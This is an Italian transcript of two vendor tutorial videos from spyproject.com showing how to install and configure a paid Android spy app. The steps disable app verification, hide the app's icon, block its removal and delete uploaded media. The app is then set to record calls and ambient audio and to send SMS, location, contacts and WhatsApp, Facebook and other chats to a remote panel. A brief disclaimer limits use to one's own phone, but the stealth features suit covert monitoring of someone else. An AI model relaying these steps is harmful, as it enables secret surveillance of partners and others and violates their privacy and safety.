Da spyproject.com oggi vi farò vedere come installare il software per controllo cellulare personale. Allora, digitiamo il sito dal quale scaricare, chiaramente dopo aver ricevuto il pagamento, ripeto, non è gratis. Privacyfull.com slash privacyfull. Punto APK. Questo file lo riceverete quando, non appena avrete effettuato il pagamento, vi arriverà una mail con le credenziali di accesso, fra le quali troverete anche il download. Come vedete, è partito. Il download è partito. Abbiamo il download qui in alto. Sta scaricando. Allora, nell'attesa che si compia il download, vi dico alcune note legali. Quindi è fatto divieto assoluto l'installazione diciamo del software verso telefoni terzi, e quindi è consentito dalla legge solamente l'utilizzo sul proprio cellulare per non andare incontro a un reato penale, quindi è vietato dalla legge, è punito da 1 a 4 anni di reclusione. E adesso procediamo con l'installazione. Ignora avviso. Allora, impostiamo le impostazioni ovviamente di sorgenti sconosciute e non selezioniamo verifica applicazioni, quindi sorgenti sconosciute. Ok, successivo, installa. Una volta che si procede con l'installazione, applicazione installata, apri. Quindi quando noi apriremo l'installazione, succede che dovrò in questi casi tutte le giurisdizioni del mondo è illegale, quindi quello che insomma vi ho detto è quello di utilizzare questo. Solo ed esclusivamente sul cellulare personale. Quindi accettiamo e si apre la schermata. Digitiamo il nostro indirizzo email. In questo caso mettiamo il nostro. Confermiamo. Clicchiamo su OK, si registra sulla rete. E ci dice che la nostra registrazione è andata a buon fine. Ok, il dispositivo in questo momento non dà diritti di root, quindi ne sono a conoscenza. Quindi abbiamo le varie schermate che prevediamo nel prossimo video. Grazie. Buongiorno a tutti da spyproject.com. Allora, questo è il secondo video sull'installazione praticamente del software. Quindi chiaramente ci sono delle chiare schermate, sono fondamentalmente tre schermate, e questa schermata praticamente in questo le cose molto importanti, poi chiaramente c'è il manuale dal quale si potrà approfondire la lettura. Bisogna attivare e disattivare ovviamente, bisogna nascondere se si vuole l'icona e nei casi con root cliccando questa icona praticamente sparisce. Cioè, non appare nemmeno più sulla lista delle applicazioni. Da qui preveniamo l'installazione praticamente bloccandola. Notifica del cambio SIM, il numero di notifica al quale insomma arrivano i file. Qua abbiamo l'eliminazione automatica dei file multimediali. Quindi, una volta che il telefono ha scaricato sul pannello di controllo i file, li cancella dalla memoria SD. Poi impostiamo la password. Qua una cosa molto importante è quella di selezionare qua in fondo i minuti. Praticamente questo è il minuto ogni quanto tempo si connette con il server. Io consiglio un minuto, ma anche 5 minuti vanno bene. Seconda schermata, scegliamo
quale tipo di invio vogliamo far fare al software, o pannello di controllo o anche email, qui chiaramente insieme alla nostra email, oppure anche via SMS. L'unica cosa è che gli SMS chiaramente non mandano tutti i dati, ma mandano solo alcuni dati, limitatamente ai messaggi di testo, posizione, log delle chiamate e posizione GPS. In questo numero metteremo, in questo campo inseriremo il numero al quale arriveranno le notifiche. Nell'ultima schermata abilitiamo la registrazione delle chiamate, la strategia delle chiamate, quindi in automatico lui si sceglie la strategia migliore, e come ultima risorsa eventualmente scegliete microfono. Formato di registrazione abbiamo 3GP o AMR, scegliete voi. L'accensione automatica del GPS ogni 5 minuti, 10 minuti, mezz'ora, eccetera, eccetera. E qui scegliamo tutte le funzioni, quindi che sono report SMS, ad esempio se vogliamo che ci mandi i report, registri delle chiamate, ovviamente il tabulato, i contatti, quindi la rubrica, gli URL visitati, le foto scattate, i video girati, le email di Gmail, la chat di WhatsApp, la chat di Facebook, chat di Viber, chat di Skype, chat di VK, le foto di Facebook. In aggiunta in itinere il calendario con gli appuntamenti e la registrazione ambientale è già implementata, ma mediante comando SMS. Non appena avrete inserito per due volte l'email, praticamente vi arriverà in automatico una mail con le credenziali di accesso, quindi dove andare a guardare poi i report arrivano sul primo sito. L'username che vi è stato assegnato, che non sarebbe altro che la vostra email, la password, la data di scadenza e l'eventuale rinnovo si può creare direttamente dalla vostra email. Poi abbiamo le informazioni relativamente al supporto.